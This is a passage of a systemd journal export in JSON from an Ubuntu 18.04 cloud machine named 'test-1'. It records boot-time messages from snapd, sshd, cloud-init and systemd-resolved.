"_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "helpers.go:145: error trying to compare the snap system key: system-key missing on disk" } { 
"__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33d;b=e2b08827b5804427b422c10c84f1567e;m=2aec53e;t=5bd16df7244a6;x=cc7837c983afc749", "__REALTIME_TIMESTAMP" : "1615280819291302", "__MONOTONIC_TIMESTAMP" : "45008190", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "pollinate.service", "INVOCATION_ID" : "5edd02af8c5c46d9a48fd71b8afc0a40", "MESSAGE" : "Started Pollinate to seed the pseudo random number generator.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819287852" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33e;b=e2b08827b5804427b422c10c84f1567e;m=2aef68d;t=5bd16df7275f4;x=2f8d56aa93754fe9", "__REALTIME_TIMESTAMP" : "1615280819303924", "__MONOTONIC_TIMESTAMP" : "45020813", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", 
"_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting OpenBSD Secure Shell server...", "UNIT" : "ssh.service", "INVOCATION_ID" : "93b3a6735e0a4aa6b67f86bb4665a76e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819300793" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33f;b=e2b08827b5804427b422c10c84f1567e;m=2af6720;t=5bd16df72e686;x=75277391dc9d1904", "__REALTIME_TIMESTAMP" : "1615280819332742", "__MONOTONIC_TIMESTAMP" : "45049632", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "daemon.go:338: started snapd/2.40+18.04 (series 16; classic) ubuntu/18.04 (amd64) linux/4.15.0-60-generic." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=340;b=e2b08827b5804427b422c10c84f1567e;m=2b00b96;t=5bd16df738afe;x=bca15ef339dacb2e", "__REALTIME_TIMESTAMP" : "1615280819374846", "__MONOTONIC_TIMESTAMP" : "45091734", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "SYSLOG_FACILITY" : "4", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "sshd", "SYSLOG_PID" : "939", "MESSAGE" : "Server listening on 0.0.0.0 port 22.", "_PID" : "939", "_COMM" : "sshd", "_EXE" : "/usr/sbin/sshd", "_CMDLINE" : "/usr/sbin/sshd -D", "_SYSTEMD_CGROUP" : "/system.slice/ssh.service", "_SYSTEMD_UNIT" : "ssh.service", "_SYSTEMD_INVOCATION_ID" : "93b3a6735e0a4aa6b67f86bb4665a76e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819374819" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=341;b=e2b08827b5804427b422c10c84f1567e;m=2b00d9c;t=5bd16df738d03;x=487ff0bcc8930184", "__REALTIME_TIMESTAMP" : "1615280819375363", "__MONOTONIC_TIMESTAMP" : "45092252", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "SYSLOG_FACILITY" : "4", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "sshd", "SYSLOG_PID" : "939", "_PID" : "939", "_COMM" : "sshd", "_EXE" : "/usr/sbin/sshd", "_CMDLINE" : "/usr/sbin/sshd -D", "_SYSTEMD_CGROUP" : "/system.slice/ssh.service", "_SYSTEMD_UNIT" : "ssh.service", "_SYSTEMD_INVOCATION_ID" : "93b3a6735e0a4aa6b67f86bb4665a76e", "MESSAGE" : "Server listening on :: port 22.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819375357" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=342;b=e2b08827b5804427b422c10c84f1567e;m=2b019b5;t=5bd16df73991d;x=3fed89be52fad7be", "__REALTIME_TIMESTAMP" : "1615280819378461", "__MONOTONIC_TIMESTAMP" : "45095349", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "ssh.service", "INVOCATION_ID" : "93b3a6735e0a4aa6b67f86bb4665a76e", "MESSAGE" : "Started OpenBSD Secure Shell server.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819375573" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=343;b=e2b08827b5804427b422c10c84f1567e;m=2b034ae;t=5bd16df73b416;x=c95b0d8e6ae4d6f", "__REALTIME_TIMESTAMP" : "1615280819385366", "__MONOTONIC_TIMESTAMP" : "45102254", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : 
"39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "snapd.service", "INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "Started Snappy daemon.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819381660" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=344;b=e2b08827b5804427b422c10c84f1567e;m=2b04403;t=5bd16df73c36b;x=3cba2937f0e3ef5d", "__REALTIME_TIMESTAMP" : "1615280819389291", "__MONOTONIC_TIMESTAMP" : "45106179", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Wait until snapd is fully seeded...", "UNIT" : "snapd.seeded.service", "INVOCATION_ID" : "1c1d94917e114885abda5e3055bfa378", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819387422" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=345;b=e2b08827b5804427b422c10c84f1567e;m=2b67456;t=5bd16df79f3bd;x=443fb77a1ce2e531", "__REALTIME_TIMESTAMP" : "1615280819794877", "__MONOTONIC_TIMESTAMP" : "45511766", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : 
"snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "stateengine.go:108: state ensure error: cannot sections: got unexpected HTTP status code 403 via GET to \"https://api.snapcraft.io/api/v1/snaps/sections\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=346;b=e2b08827b5804427b422c10c84f1567e;m=2b8db68;t=5bd16df7c5acf;x=c5ecd1f1656c7b65", "__REALTIME_TIMESTAMP" : "1615280819952335", "__MONOTONIC_TIMESTAMP" : "45669224", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "snapd.seeded.service", "INVOCATION_ID" : "1c1d94917e114885abda5e3055bfa378", "MESSAGE" : "Started Wait until snapd is fully seeded.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819949158" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=347;b=e2b08827b5804427b422c10c84f1567e;m=2b8ec71;t=5bd16df7c6bd8;x=1551beb68721512d", "__REALTIME_TIMESTAMP" : "1615280819956696", "__MONOTONIC_TIMESTAMP" : "45673585", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", 
"_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Apply the settings specified in cloud-config...", "UNIT" : "cloud-config.service", "INVOCATION_ID" : "f2478185d2b54165b8bd325c095e3331", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819956688" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=348;b=e2b08827b5804427b422c10c84f1567e;m=2b91065;t=5bd16df7c8fcc;x=959a8e1f960992fa", "__REALTIME_TIMESTAMP" : "1615280819965900", "__MONOTONIC_TIMESTAMP" : "45682789", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Multi-User System.", "UNIT" : "multi-user.target", "INVOCATION_ID" : "8176e1f32136427eaa06e0cafe7e88f0", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819963561" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=349;b=e2b08827b5804427b422c10c84f1567e;m=2b9288d;t=5bd16df7ca7f4;x=dad6cb90a3b3aa08", "__REALTIME_TIMESTAMP" : "1615280819972084", "__MONOTONIC_TIMESTAMP" : "45688973", 
"_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Graphical Interface.", "UNIT" : "graphical.target", "INVOCATION_ID" : "7b20e5aea4164961a1a8bc0fe70f2e67", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819969962" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34a;b=e2b08827b5804427b422c10c84f1567e;m=2b94255;t=5bd16df7cc1bc;x=a1e8a6d119c9cf1", "__REALTIME_TIMESTAMP" : "1615280819978684", "__MONOTONIC_TIMESTAMP" : "45695573", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Update UTMP about System Runlevel Changes...", "UNIT" : "systemd-update-utmp-runlevel.service", "INVOCATION_ID" : "8c815e0fd19e40f9bc94a57c9e239dbb", 
"_SOURCE_REALTIME_TIMESTAMP" : "1615280819976442" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34b;b=e2b08827b5804427b422c10c84f1567e;m=2b982e9;t=5bd16df7d0251;x=653948edf2957aa5", "__REALTIME_TIMESTAMP" : "1615280819995217", "__MONOTONIC_TIMESTAMP" : "45712105", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-update-utmp-runlevel.service", "INVOCATION_ID" : "8c815e0fd19e40f9bc94a57c9e239dbb", "MESSAGE" : "Started Update UTMP about System Runlevel Changes.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819992743" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34c;b=e2b08827b5804427b422c10c84f1567e;m=2d159d0;t=5bd16df94d937;x=6afd60d65973aa91", "__REALTIME_TIMESTAMP" : "1615280821557559", "__MONOTONIC_TIMESTAMP" : "47274448", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "4", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : 
"systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "_CAP_EFFECTIVE" : "0", "CODE_FILE" : "../src/resolve/resolved-dns-transaction.c", "CODE_LINE" : "981", "CODE_FUNC" : "dns_transaction_process_reply", "MESSAGE" : "Server returned error NXDOMAIN, mitigating potential DNS violation DVE-2018-0001, retrying transaction with reduced feature level UDP.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280821557349" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34d;b=e2b08827b5804427b422c10c84f1567e;m=2d15c93;t=5bd16df94dbfb;x=247ae29ca751753b", "__REALTIME_TIMESTAMP" : "1615280821558267", "__MONOTONIC_TIMESTAMP" : "47275155", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "4", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "_CAP_EFFECTIVE" : "0", "CODE_FILE" : "../src/resolve/resolved-dns-transaction.c", "CODE_LINE" : "981", "CODE_FUNC" : "dns_transaction_process_reply", "MESSAGE" : "Server returned error NXDOMAIN, mitigating potential DNS violation DVE-2018-0001, retrying transaction with reduced feature level UDP.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280821557482" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34e;b=e2b08827b5804427b422c10c84f1567e;m=2d7b806;t=5bd16df9b376e;x=2294cfd776b550f5", "__REALTIME_TIMESTAMP" : "1615280821974894", "__MONOTONIC_TIMESTAMP" : "47691782", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : 
"6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "946d9c088eee49f399e2b8f8748cb430", "MESSAGE" : "Cloud-init v. 19.1-1-gbaa47854-0ubuntu1~18.04.1 running 'modules:config' at Tue, 09 Mar 2021 09:07:00 +0000. Up 46.18 seconds.", "_PID" : "967", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init modules --mode=config", "_SYSTEMD_CGROUP" : "/system.slice/cloud-config.service", "_SYSTEMD_UNIT" : "cloud-config.service", "_SYSTEMD_INVOCATION_ID" : "f2478185d2b54165b8bd325c095e3331" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34f;b=e2b08827b5804427b422c10c84f1567e;m=2d8b7a5;t=5bd16df9c370d;x=293794bdaf1cd8d8", "__REALTIME_TIMESTAMP" : "1615280822040333", "__MONOTONIC_TIMESTAMP" : "47757221", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "cloud-config.service", "INVOCATION_ID" : "f2478185d2b54165b8bd325c095e3331", "MESSAGE" : "Started Apply the settings specified in cloud-config.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822037495" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=350;b=e2b08827b5804427b422c10c84f1567e;m=2d8c1e5;t=5bd16df9c414c;x=1d7ee7480e09a411", "__REALTIME_TIMESTAMP" : "1615280822042956", "__MONOTONIC_TIMESTAMP" : "47759845", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Execute cloud user/final scripts...", "UNIT" : "cloud-final.service", "INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822042948" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=351;b=e2b08827b5804427b422c10c84f1567e;m=2e2257e;t=5bd16dfa5a4e2;x=f8cfeef9f82611a5", "__REALTIME_TIMESTAMP" : "1615280822658274", "__MONOTONIC_TIMESTAMP" : "48375166", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "MESSAGE" : "", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : 